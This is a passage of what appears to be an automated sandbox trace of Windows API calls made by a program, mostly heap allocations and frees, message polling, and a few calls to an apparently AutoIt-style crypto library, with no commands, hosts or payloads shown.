(HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.025] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.025] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.026] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0040.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.026] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0040.027] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0040.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.028] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.031] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.031] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.031] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.031] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0040.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.031] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.032] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.032] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.032] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 